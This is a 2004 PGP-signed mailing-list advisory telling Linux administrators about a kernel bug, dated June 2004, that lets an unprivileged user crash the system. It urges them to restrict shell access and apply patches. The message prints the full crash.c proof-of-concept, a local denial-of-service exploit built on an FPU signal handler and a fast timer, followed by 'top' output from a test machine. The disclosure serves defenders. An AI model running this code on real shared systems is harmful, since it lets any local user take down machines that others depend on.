-----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 To whom it may concern - forward to your linux admins,
because of a security bug inside the Linux Kernel i blocked shell access at the moment for several users. You can test this exploid at your own machine: http://linuxreviews.org/news/2004-06-11_kernel_crash/#toc1 Inside the Marc mailing list archive this bug was noticed with a mail from 2004 - 06 -09 ~10 pm. The critical point is that its possible to kill the system without having root rights. There are some patches available. But my security advice is at the moment to follow the disscusion and to stop shell access. At running productive machines we have some time. Keep attention for this C code http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt #include <sys/time.h> #include <signal.h> #include <unistd.h> static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1); return 0; } ##### Inside the discussion i the people wrote that UML user mode linux the code is also malicious. I couldn't verfy it. But i suggest to check it carefully and block also UML users for shell access. ##### Some users wrote that they a test it and they are unable to kill the process :-) castor:~ # uname -a Linux castor 2.6.7-rc3 #1 SMP Mon Jun 7 23:57:07 CEST 2004 i686 Intel(R) Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux (Hyperthreading) top shows top - 02:13:43 up 4 days, 10:25, 1 user, load average: 3.95, 4.03, 2.60 Tasks: 112 total, 5 running, 107 sleeping, 0 stopped, 0 zombie Cpu0 : 57.8% us, 2.3% sy, 0.0% ni, 39.9% id, 0.0% wa, 0.0% hi, 0.0% si Cpu1 : 0.0% us, 100.0% sy, 0.0% ni, 0.0% id, 0.0% wa, 0.0% hi, 0.0% si There is no reason for get any panic. Sysadmins just follow the discussion and patch your system. If you don't need a patch, because you don't allow shell access for users: Review your own risk management inside your organisation for internal quality management. - -- Mit freundlichen Grüssen Wilfried Goedert mailto:[EMAIL PROTECTED] -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUAQM6lU7DOY8Ksl5PhAQGVjgP/QtqnL58Peba8zl9WMoj5vvdK90P1+w0T uxJuprKBxHXqOAkWd8k3Kvl8lYmw+tRoSfEmoc9JiXTtH+msKJTgVqEEi3Jk9t8N kiasG/+wuxe2ADn+SHMOSu4EIB16A2lThItavwVvFBUIcdth6/MsjTbU0tbJI7Dc 4NYoiBiwEmI= =XmJS -----END PGP SIGNATURE----- ------------------------------------------------------- This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND _______________________________________________ Care2002-developers mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/care2002-developers
